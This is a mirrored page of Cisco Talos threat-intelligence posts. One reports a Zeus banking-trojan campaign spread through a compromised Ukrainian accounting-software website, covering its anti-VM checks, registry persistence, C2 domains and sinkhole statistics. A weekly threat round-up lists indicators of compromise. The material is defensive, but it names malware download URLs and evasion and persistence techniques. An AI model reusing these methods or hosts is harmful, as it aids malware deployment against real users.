Quantcast
Channel: Cisco Talos Blog
Viewing all 2012 articles
Browse latest View live

Not So Crystal Clear - Zeus Variant Spoils Ukrainian Holiday

$
0
0
This post was authored by Edmund Brumaghin with contributions from Ben Baker, Dave Maynor and Matthew Molyett.

Introduction


Talos has observed a cyber attack which was launched using the official website of the Ukraine-based accounting software developer Crystal Finance Millennium (CFM). This vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. However, the attackers did not compromise the firm's update servers and did not have the level of access noted in the Nyetya compromise. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. Websites being compromised to serve malicious content is common and it appears that CFM's website was leveraged in the same way. This can be achieved through exploitation of existing vulnerabilities in server-side software or brute-forcing weak credentials, allowing attackers to gain remote administrative access. The fact that it is an accounting software company in Ukraine and the timing of the attack increased visibility.

This attack occurred in August 2017, during the time frame associated with the observance of the Independence Day holiday in Ukraine. The details of the specific malware infection process itself have been previously documented here. Talos was able to register and sinkhole one of the Command and Control (C2) domains and through this, obtain additional details regarding the scope of this attack and associated victims. This blog provides additional information related to the geographic regions that were targeted by this attack as well as the size and scope of of systems that were successfully compromised.

Spam Campaign


Malicious spam emails were used to spread the malware to various targets. These emails contained a ZIP archive that contained a JavaScript file. The Javascript files function as malware downloaders. When opened using default file associations on Windows, the Javascript executes causing the system to retrieve the malware payload and run it, thus infecting the system. In this particular instance, one of the domains used to host the malware payload happened to be associated with CFM's website. The CFM website has also been observed distributing PSCrypt ransomware.
Figure 1: Downloader Code Snippet

The Javascript downloader uses an array to define the distribution locations that the downloader should use to retrieve the malware payload. The characters are reverse order, as shown in the above screenshot. Rearranging them, we can see that one of the distribution servers is associated with CFM's website. Reversed, all of the URLs listed are as follows:

     hXXp://cfm[.]com[.]ua/awstats/load.exe
     hXXp://crystalmind[.]ru/versionmaster/nova/load.exe
     hXXp://nolovenolivethiiswarinworld[.]com/ico/load.exe

Once executed, victims were infected with a variant of the ZeuS banking trojan. The source code associated with version 2.0.8.9 of ZeuS was leaked in 2011 and has since been taken and incorporated into several other banking trojans. Using the Function Identification and Recovery Signature Tool (FIRST) platform, Talos was able to identify significant code reuse between the malware being distributed by this campaign and the leaked version of the ZeuS source code.
Figure 2: FIRST Code Comparison

Infection Process


Once executed on systems, the malware performs several actions to determine whether it is being executed in a virtualized sandbox environment. Specifically the malware surveys the system and and performs the following anti-VM checks. If any of the checks succeed, this results in an infinite sleep function.
  • Checks to see if Sample is in the ModuleFileName.
  • Checks to determine if the VolumeSerialNumber equals 0x00CD1A40.
  • Checks to determine if the VolumeSerialNumber equals 0x70144646.
  • Checks to see if sbiedll is loaded.
  • Checks to see if dbghelp is loaded.
  • Checks System\CurrentControlSet\Services\Disk\Enum for the following values:
    • 005cefc0 "qemu"
    • 004ee9c0 "virtual"
    • 004ee9e0 "vmware"
    • 004eea00 "xen"
    • 004ee628 "ffffcce24"
In cases where the malware does not detect it is operating in a sandbox environment, it then takes steps to achieve persistence on infected systems. First, the malware calculates a "SystemId" value which is used to uniquely identify the infected system. This value is calculated based upon ComputerName, Primary hard drive serial number as well as a pre-shared value. The malware then calculates the folder location and filename used to store a PE32 file that will be run each time the infected system is rebooted. The folder location is based on the first eight bytes of the SystemId (/YYYYYYYY/). The filename is based on the final eight bytes of the SystemId (XXXXXXXX.exe).

The malware then creates a registry entry that is used to ensure the malware is executed each time the system is restarted. To determine where to create the registry entry, the malware selects a random subkey within HKEY_CURRENT_USER\Software (ZZZZZZZZ). It will then create the registry entry that achieves persistence. An example is below:
Figure 3: Persistence Mechanism

A malicious executable is then copied to the following folder location, which is referenced in the registry entry previously created.

C:\Users\Administrator\AppData\Roaming\Microsoft\YYYYYYYY\XXXXXXXX.exe

If the malware receives plugin code to run then that is saved to the following location:

C:\Users\Administrator\AppData\Roaming\Microsoft\YYYYYYYY\YYYYYYYY

Command & Control


After infecting the system the malware attempts to reach out to different command and control servers:

     hXXp://contsernmayakinternacional[.]ru/
     hXXp://soyuzinformaciiimexanikiops[.]com/
     hXXp://kantslerinborisinafrolova[.]ru/

When Talos began researching the threat we found that one of the domains was already being sinkholed, one was being controlled by the bad actors, and the third was not yet registered. It also appeared that the C2 activities were sequential where it would process through the list of servers waiting for the first one to successfully respond. The server that was already sinkholed was just terminating the connection. The second domain was not registered and that is where Talos was able to take advantage of the sequential aspect of the command and control communications.

Talos Interdiction


As mentioned in the previous section, Talos identified that one of the C2 domains was available and quickly registered it, pointing DNS to our sinkhole server which gave significant visibility into the number of machines infected by this malware, as well as geographic scope of infections. Below is a graphic showing which countries were most heavily affected by this threat based on the geographic location of systems beaconing to our sinkhole server.
Figure 4: Affected Regions

Interestingly, most of the systems which beaconed to our sinkhole server were located in the Ukraine with United States being the second most affected region. A graph showing the ISPs that were most heavily affected is below:
Figure 5: Affected Network Providers

As can be seen in the graph above, PJSC Ukrtelecom was by far the most heavily affected. This ISP is the company governed by the Ministry of Transportation and Communications in Ukraine. In total, our sinkhole logged 11,925,626 beacons from 3,165 unique IP addresses, which demonstrates the size of the spread of this particular malware.

Conclusion


As we saw repeatedly throughout 2017, attackers are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers as a means of obtaining a foothold within the environments they are targeting. As organizations deploy more effective security controls to protect their network environments attackers are continuing to refine their methodologies. Talos will continue to monitor the threat landscape to identify new attacks and ensure that customers remain protected from these new supply chain based attacks as they become increasingly prevalent and continue to evolve.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOC's


Malware Distribution URLs


hXXp://cfm[.]com[.]ua/awstats/load.exe
hXXp://crystalmind[.]ru/versionmaster/nova/load.exe
hXXp://nolovenolivethiiswarinworld[.]com/ico/load.exe

Malicious File Hash:


8cc7e0bff3f2f6962ebad222240696b1e9cce3e9e26abcf5936fd3146613976f (SHA256)

C2 Domains


hXXp://contsernmayakinternacional[.]ru/
hXXp://soyuzinformaciiimexanikiops[.]com/
hXXp://kantslerinborisinafrolova[.]ru/


Threat Round Up for December 29 - January 5

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between December 29 and January 05. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Doc.Downloader.Trickbot-6412300-1
    Office Macro Downloader
    This downloader was submitted to ThreatGrid more than 50 times on December 26. This office document downloads a multipayload Trickbot loader. This post-Christmas gift is not something that somebody just back from the holiday wants to open.
     
  • Doc.Dropper.Agent-6412231-0
    Office Macro Downloader
    This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The sample was unable to download the next stage so no further analysis is available.
     
  • Doc.Macro.Necurs-6412436-0
    Downloader
    Another wave of OLE based downloaders spiked in prevalence just prior to the new year. The samples use obfuscated VBA macros to download various malware families distributed for the Necurs botnet, including Locky.
     
  • Ppt.Downloader.CVE_2017_8759-6413368-0
    Office Macro Downloader
    These PowerPoint files contain an XML, located in ppt/slides/_rels/slide1.xml.rels, with a malicious SOAP WSDL definition that leverages CVE-2017-8759. If the file is saved as a PPSX, the slideshow will automatically start on opening, triggering the malicious code.
     
  • Win.Ransomware.PolyRansom-6413978-0
    Ransomware
    PolyRansom variants continue to thrive in 2018. PolyRansom is polymorphic ransomware that spreads by infecting other executables. It gains persistence through an installed service, and run keys added to the registry. Its primary infection vectors are share network drives, removable media, and email.
     
  • Win.Trojan.Generic-6414413-0
    Trojan
    This cluster provides generic detection for the Emotet Trojan downloaded onto a targets machine. Emotet is a banking trojan that has remained relevant due to its continual evolution to by pass antivirus products.
     
  • Win.Trojan.Multi-6413508-0
    Trojan
    This trojan will potentially connect to one or more servers to receive instructions and download additional malware.
     

Threats

Doc.Downloader.Trickbot-6412300-1


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • 316D1C7871E00
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • \BaseNamedObjects\C1A8DFE67F9832960
IP Addresses
  • 89[.]161[.]153[.]74
Domain Names
  • jas-pol[.]com[.]pl
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\Inue8.bat
  • %AppData%\localservice\Wn-lbzpms.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\mo-r.exe
  • %AppData%\localservice\mo-r.exe
  • %TEMP%\Ecmjtqf.bat
  • %AppData%\localservice\Modules\injectDll64_configs\sinj
  • %AppData%\localservice\Modules\injectDll64_configs\dinj
  • %TEMP%\Wn-lbzpms.exe
File Hashes
  • 3e5a5c672052182d9d10b0d094f07ec67f182939556c90f66236d75d4e795cd6
  • 07a1d83e2fdce0b0383fc05e2931d3aa557e3eeeeca50762258431ecf6fc2c50

Coverage


Screenshots of Detection

AMP


ThreatGrid


Umbrella


Screenshot






Doc.Dropper.Agent-6412231-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • weekendfakc[.]top
Files and or directories created
  • N/A
File Hashes
  • 024782b5d080879af2a7a4280d262929e85e9815b2b37e9aeb6384a26e97895e
  • 0ad1db5a012d54fe11b06cf8b8822135e5285e21ab99e7ae5c8ca1892836375b
  • 1283fc95f56f1f32dcfeb5ec042a53f6e0dbd05d49c5bbc892e389cfc5613d9a
  • 1a5257c6cd2e03848758d9541cbf4918194ff33669029a06baee9317d1a9a527
  • 211e5c8d07af1e6b61acb7af8bb1e0fefe25bee88275f2db8d53f868dc991e0e
  • 23c8026cd6414fa083f83c856c9142af5905747eabb32d0d0d839e21f941bf3e
  • 25191548ef2032df4acb687d940854f134de3aa738b69fc578e5397e95496afd
  • 28f9a67de7f6b79b4bf66da9d114c723e16d619f6787257eff856c71b1c7047f
  • 29062cd2c2d09199fc0716485e0e3a1fff880195a92c78ecd5f0e5184ac07820
  • 2b24aa417d6ab02fa9f82be1a41bc8c2e5de814057ed76074e2960d74f31d2d1

Coverage


Screenshots of Detection

AMP


ThreatGrid


Umbrella







Doc.Macro.Necurs-6412436-0


Indicators of Compromise


Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce
Mutexes
  • Groove:PathMutex:tzanqCjN6dCs1QGzbKslin0UfIk=
IP Addresses
  • 98[.]124[.]252[.]145
Domain Names
  • pragmaticinquiry[.]org
Files and or directories created
  • %TEMP%\ASPNETSetup_00001.log..doc
  • \Users\Administrator\AppData\Local\Adobe\Acrobat\9.0\Updater\updater.log..doc
  • \Users\Administrator\Read___ME.html
  • %TEMP%\ASPNETSetup.log..doc
  • \Users\Administrator\AppData\Local\Adobe\Acrobat\9.0\Updater\Read___ME.html
File Hashes
  • a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d
  • d4a8da30821df543407bcbbc25bf2a89db3d3f5c8d49fddeddaecd3b47c111ef
  • a9db16baffc0b92aacae6647952fc2d32673998fc035493d50d32bad5bceb516
  • f07f747978b7d8bed904ccadbcc49f184bc16e872f22d7b53b1030bc22ebd794
  • 9b48b6bc6ee491a2b180d6b353ae8f8da230f27a0cdfc1757c58a4819664b790
  • 0c51e3df0b09f14e04b268102afc9342c35fcc2460c645f9c8d21b2413910d32
  • 0cfdad54484cf1d4ff9be267469edefdb98e963ffabd6beeb081a208e3fca9ac
  • 1c2f0a28b5c13eb2967078d947924c9a4a5f8f845d3899986df19e8a166d3ec0
  • 241f83caf5c5a23a1d7adbeaa8c392da0edadff362f41bbb5727dc71887048c4
  • 305790984d5ffa713794c1732eea4f83f18da6926e415a490b2fc090f2c4e8dc
  • 305f855ff8d47be5cc2d57e137a436bb2e17b1783f6cc5b8302c2df56b75afd7
  • 32d85f3dded85d0375965a50991ddb7b608166f51a12b297ae981348119512da
  • 36fc2029280816810324e3be9cf3a4257f0dbb1a8b11eaffdbacdead863aaf44
  • 3abdf9d8249e3cc7507529aec80d93551f1fcd714a61861a69c059662aa39e9f
  • 495b93c1a9940e94c14063b1e52877864d54fb544a3a32e923b0530cb03c96cf
  • 4c04d8aeebdd0eb1747a9a66b10e4681328a03edcbcbd0e9921c4a74367bbd08
  • 580b05987531aa4ef4bed150bd51fdbbcad5f95abb63e8439e3d4bb07eb68598
  • 5c4d5f6d7d0a8d4e805c1341cadf76a924aa2fe6437d432d96f103c4319e84c2
  • 6e35534f8b79187dbe2fbdd1b0a21b03752a89df5981cb6fb89154eb7b34a087
  • 8f36a3ebcb2714d7f6d99d8d0672bcdf16980da788331953cba52c21fde64efb
  • 962beb562acef288c5ef09f14e366d7ff3f51a00dd28b3dc5c0e388c92d3c0a2
  • c2f482372523031b880b7a4f1909b30b5aa20304d0a691309484ad49a0c451d5
  • cab8fcbe8bce311464418e2fcd05e55353255c511e698726e009f075de82e2ea
  • ce5d33fb70fc7834d8faa7749d5cedbcb6b0958105ebe94633e2daba897612ef
  • d18256e9f4062259e941028c531c5219b63446a35c524ef00554c69de2110e98

Coverage


Screenshots of Detection

AMP


ThreatGrid


Umbrella


Screenshot






Ppt.Downloader.CVE_2017_8759-6413368-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: VRGTQ
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • u[.]teknik[.]io
  • kistags[.]com
  • graceland2017[.]com
  • 0i3tenrainy[.]loan
  • goochandhousego[.]pro
  • dayi-yc[.]com
Files and or directories created
  • %ProgramFiles%\Rfjd\confighbch.exe
  • %TEMP%\dsruxkfs.0.cs
  • %TEMP%\dsruxkfs.cmdline
  • %TEMP%\dsruxkfs.err
  • %TEMP%\i02bp4bi.0.cs
  • %TEMP%\i02bp4bi.cmdline
  • %TEMP%\i02bp4bi.dll
  • %TEMP%\i02bp4bi.err
  • %TEMP%\tmp95D4.exe
  • %TEMP%\tmp970E.exe
  • %AppData%\Roaming\982PQQP9\982logrc.ini
  • %TEMP%\dsruxkfs.out
  • %TEMP%\svchost.exe
  • %AppData%\Roaming\982PQQP9\982logim.jpeg
  • %AppData%\Roaming\982PQQP9\982logrv.ini
  • %AppData%\Roaming\tmp.exe
  • %SystemRoot%\SysWOW64\com\SOAPAssembly\http100u4teknik4io0HUKzO4png.dll
  • %SystemRoot%\SysWOW64\com\SOAPAssembly\http100u4teknik4io0HUKzO4png.pdb
File Hashes
  • 22ae9fc528b63ecfe163c2b4c472e68869e049023be009ef118c59346247082d
  • 129bddde9c3cb01c69d92d9029d5da963a0dd5a72143054f9fa97471a388e9c0
  • 2d92ee55d56e96822aca748c7d69344d90a663e0db77e7ddd0ce9befa54aba98
  • 3894ba1250493f0798f9212fc20e96e8114dcc218850fef13979410dc63affba
  • 3a26d63160a43b64ee4f4adba0a5c19cb3ee6db2dc44c0ffb7b72b621548c4f8
  • 4b4efd1527b404064604707dbf7a143745d764629d6cfcc05a6c204b66238db8
  • 56b951fe25e1d0266dd49eba6b127efe63c49d71063533cee2ba3bb7eac08744
  • 56ede7ef1d1e5216231c847eead200bc8b5c5f8ef7ac8389b7dc5f069b37831d
  • 650abb87b45b41a344c677c0d6bb6a13cbe9a66785b87a0f2ff3fb378220448c
  • 72399fbb24239a2e1897132ad0e3270103c727253275009e010c74a94f36700d
  • 7b58861aab0a53cac5ac90af09723703fb47fda584fc66212ff663c52a8150a4
  • 7ed5fec1aabe2e91524a9a84d2c4f4d29a8da5777289023c40ffbcc7810b2ee8
  • 84593a125442a9541b2992a2934f4db5cbe1a87b6e5f5edd17982e677667c53f
  • 9f9217702cc1d59edc29007f745eeec78118941f3d4f99b2f664a9677867ffb6
  • b28a3bd9be8ec8d9dec980896002d84e2544acb2625e1acbbe8351d57b2b6cfc
  • c0ed86aab56032d1ba313aa6b5eaabcd687caa28937f56f23832206f81ec1271
  • c5b450ac63234f3d23ace0379486a33788187f14b47801971ad96ace76f85410

Coverage


Screenshots of Detection

AMP


ThreatGrid


Umbrella







Win.Ransomware.PolyRansom-6413978-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSCGIYAL
    • Value: Type
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: FacAQkYU.exe
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSCGIYAL
    • Value: Start
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\zscgIYAL
Mutexes
  • \BaseNamedObjects\mMkUAokE
  • Âë@
  • MkUUAgkc1
  • ºë@
  • poAUcoMg1
  • \BaseNamedObjects\lEwoEIAg
  • \BaseNamedObjects\sgwQgcAM0
  • ²ë@
  • fusUgwwA
  • oskQowMk
  • ¢ë@
  • \BaseNamedObjects\hYsQEUYI0
  • \BaseNamedObjects\ @
  • ªë@
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %SystemDrive%\Documents and Settings\All Users\Lgwg.txt
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nOowsYQI.bat
File Hashes
  • cd32c7982ceca8711ec2f6c7ad83103db41b5d2c644b9beee07c81f92efa30a5
  • 1ff90f71632162646145cd91a22fdb24683cb25e54254f9c311d54cbc633fb92
  • 377a4c54239536019cef4c3fb2ed835a0142f58d64bc0bf49063440b7700a0b7
  • aff6517827847137411d37bafc0aee2915e87b9d2494493c1723634ba1014792
  • 38c7c22fd8526dd108422befd6fd38212ef45fb30db3272d5016fa942cd2323d
  • 3ab0d96b041b994d6f32a4351120b822d39b681d2c5133f12bb507fe2fb66e19
  • ca8eb5e89426e3c6771a72cffac6998abce9ca2a6011207691e47df1738cdeb6
  • 8957b057803dd6369f877c359b96423b61129fa3f68257c272644e1d56c7c667
  • c4471377f58643e454ef33f21dc65f696567bf8700ae120caac5086f85bfeace
  • 64fac9307649854e520f733df3df40ed960650103a78b8460488319156e059cf
  • 1dd699b7fdb082c35677938f6f064e02e226033f995189889799adac08811a18
  • 9ca5fd8ee403b418f92118836171b72a334caeb94fae9b5b46d6246742bf1345
  • 78286db82473a9f1eddba51f39333a77c2b30fb582e9fe3e71d2924e060eb273
  • 7e888fabc1451dce556864690cc55e70c8236db2a7b01b8726af0a5700ebafea
  • 6f15dc426b87da591d0a2d4965558a22857e2b1c8e1e6fdfe9c36c8a4b50a99c

Coverage


Screenshots of Detection

AMP


ThreatGrid


Screenshot






Win.Trojan.Generic-6414413-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: internat.exe
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: Microsoft Windows Manager
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
    • Value: Start
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: Microsoft Windows Manager
  • <HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache
  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Run
  • <HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • <HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Mutexes
  • \BaseNamedObjects\b11
  • b11
IP Addresses
  • 220[.]181[.]87[.]80
  • 69[.]49[.]96[.]16
Domain Names
  • www[.]murphysisters[.]org
Files and or directories created
  • \DAV RPC SERVICE
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\H3T7LZRL\m[1].exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cymycvgmtt.exe
  • \;Z:000000000000d46c\192.168.0.1\vm9-116\_\DeviceConfigManager.exe
  • %AppData%\winmgr.txt
  • \;Z:000000000000d46c\192.168.0.1\vm9-116\autorun.inf
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ftoidjlwgv.exe
  • \;Z:000000000000d46c\192.168.0.1\vm9-116\DeviceConfigManager.bat
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\H3T7LZRL\b11[1].exe
  • %WinDir%\M-5050572947025827857375865240\winmgr.exe
  • %TEMP%\phqghumeay
  • \;Z:000000000000d46c\192.168.0.1\vm9-116\.lnk
  • %TEMP%\rgjqmvnkyr
  • %TEMP%\edakubnfgu
  • \;Z:000000000000d46c\192.168.0.1\vm9-116\DeviceConfigManager.vbs
  • %TEMP%\gwhroqkhwu
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rdwpamlgaz.bat
File Hashes
  • 22bcff79015a6f2d450ff4713bc1a195f6333444e96e616fb070ccf885f790ad
  • c06da956f726a78aff82e8c2ec2ed7989f227ac560511512fd609574685f6c4f
  • e474e51a6f29b9e32702445797ef4baaa96b1e30fa3f212ae2953bbb843a559b
  • c9329790645ae7404cd3c746b9a26bcd667b6c1c45f727e504d0833d04726488
  • b95a5e8f1dc23677e9e700b44d014aeee127869e46af6a674f93d34da3c606d0
  • f3ee9f0be76f80faaa683ef580e3f018e1e0108e5b4457bad379e99dda2c627f
  • b010ae9122a8651be194c5bc3d49540d51287040f1a1f066e193835f942277a9
  • d775f05eb68ce4ef44776de0ad2b3c6181ad6a99813612a1ce3cc8b453359482
  • a3940c00bd3e8d07eb70cd23148d030a473f134a7aa19ff6b777862af6d5f8e3
  • 2104784585c92828df37feab86fcabddf3ffdb2718dfc3718ae529ad9c4956e0
  • 43d2b149b3e4fd33b03321d2bfb6980734d3725483fee21cd996f280618865d9
  • 9e7ae2436474bbad1e9ce20f8fc7a294586fde89c39b3bd2e2fd257d269ca636
  • 10c96fcbeee7e93309abc9616958ef214953f512f236ddff2db39f12a8f4a817
  • 08c9fedfcf1100f8450ad930a55a2cbf7dcc0fa88b646da2c5916ff42565c575
  • 113e003896939e85f048e528b6f50fa9e984009fe2677143c7cfaad9ee693293
  • 0d136160f510d87af7edeeb1533979a5cdc1d1511528798d5871bbb88bb1f0f4
  • 33fd94f82800a1f8551e73aebbbac4169c3c08cbe12c69e9fab52875d56c96bc
  • 1b6651d1e43c7ff8dd291d178b8bad9fbfd1bb426d49da419ee7e4a4d7912ba1
  • 1cfd3043ecc8fd7c254201fcafe6865dfdb1c0d6ccc343d0e62e1cab261fefa3
  • 201c0ca83973186aab93376147f1b60d009ef13ec827d0de5d19b483d3c0f353
  • 23db71997ed2f558e06232f600d3cc7b4e5eb58f18039923127c5b4fa7fec2f9
  • 26f1a92cb36e4caff3fccc45fba269647410fbee71cc4f4a00e5d4c282ba01f8
  • 2ab47d6d82225c62487054db91e804418060b3334531e09d96dc6d3630fa54b3
  • 34ae5c841f6e992fe09979fff521d2e8367385260cf73112e79ce656e952bbb5
  • 564ace4ef8e2c3aab367969748e02a0dee555733e9085fcc0a86b9f1b70fb7b3

Coverage


Screenshots of Detection

AMP


ThreatGrid


Umbrella







Win.Trojan.Multi-6413508-0


Indicators of Compromise


Registry Keys
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: Logman
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value: load
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value: run
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value: ProxyServer
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value: ProxyOverride
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value: DefaultConnectionSettings
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: Session Manager
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
    • Value: lsm service
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value: ClipSrv
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • www[.]wholists[.]org
Files and or directories created
  • %System16%\lsm.exe
  • %AppData%\clipsrv.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\lsm.exe (copy)
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\dllhost.exe (copy)
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\spoolsv.exe
  • %SystemDrive%\Documents and Settings\All Users\Microsoft\RCX2.tmp
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\RCX8.tmp
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\spoolsv.exe (copy)
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\RCX6.tmp
  • %AppData%\ieudinit.exe
  • %SystemDrive%\DOCUME~1\ALLUSE~1\clipsrv.exe
  • \TEMP\d0a08beb99882af4b1771426905ee556.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\dllhost.exe
  • \Users\Administrator\AppData\Local\Microsoft\dllhst3g.exe
  • %System16%\smss.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\RCX4.tmp
  • %WinDir%\SysWOW64\drivers\ieudinit.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\lsm.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\dllhst3g.exe
  • %SystemDrive%\Documents and Settings\All Users\Microsoft\mstinit.exe (copy)
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\esentutl.exe
  • %SystemDrive%\DOCUME~1\ALLUSE~1\clipsrv.exe (copy)
  • %SystemDrive%\Documents and Settings\All Users\Microsoft\mstinit.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\dllhst3g.exe (copy)
  • %WinDir%\spoolsv.exe (copy)
  • \Users\Administrator\AppData\Local\Microsoft\rsvp.exe
  • %WinDir%\logman.exe
  • %WinDir%\spoolsv.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\esentutl.exe (copy)
File Hashes
  • ec3075ac9775e3c41bc8227a00ef76905bbd96a62b813c99f277865ff353c5ce
  • f4b6b76dec96cc9d530dd6cb64bdd743a115a12a7b03e41f7ec737e4d80b6850
  • b1da876da56ba09770d594765727d167bf1a655247f094360e032a35d3d41461
  • b82ebd17236c41d9e457f640a2871695326ef8014ebd71b7a5f37d8b2c3a4522
  • b3f5ad44f682104d536c60832d2064f71d3261ffbf0e1555c236a36b505619d3
  • a27376262110767a28e376b723caa46d3cc50d33da60029df8e7af024ff67be9
  • f1b2bbf13bde9ce65cbe1cee7e3d86a61e0511f206ae74589329dc1fffc5f7e0
  • 17023d977e2b041c8a1994e7ae69b65e10f7097febefc9b47817dd9f7985cd52
  • e5c95545895dc13626b3f20b47fe2f0f1b5dc3915fef44c3c7a5352e95beb382
  • 6d1b40fbdcad0c96c687f661469e39b7b10a0b083a9ea3c9f6bb959c284df149
  • 7d1ae051d633a3ed3c0991aaa3ed63357804a80e67dd19ae5deab71e525947a6
  • 799e5b77de09f7971f0187b69266e45f70e0cda170c615c604806ec2444ab89a
  • 910b590e28bc72bc14c05d47a026ed56928ea8b6608f626555d955beccb719c8
  • 7d326add0d36be4543317c4d14823e2cb380f7b07bacc1f893ec86bdd0b04468
  • 5af23d9dedc83e1fe8c808fe62d858767dd95f2b9402fa785072cc7247a2e4c6
  • bf828a8f3fb1a27532aa9f3fb0383a1ce3418f7dd52cefa4264ab2e3e941e8d9

Coverage


Screenshots of Detection

AMP


ThreatGrid


Meltdown and Spectre

$
0
0
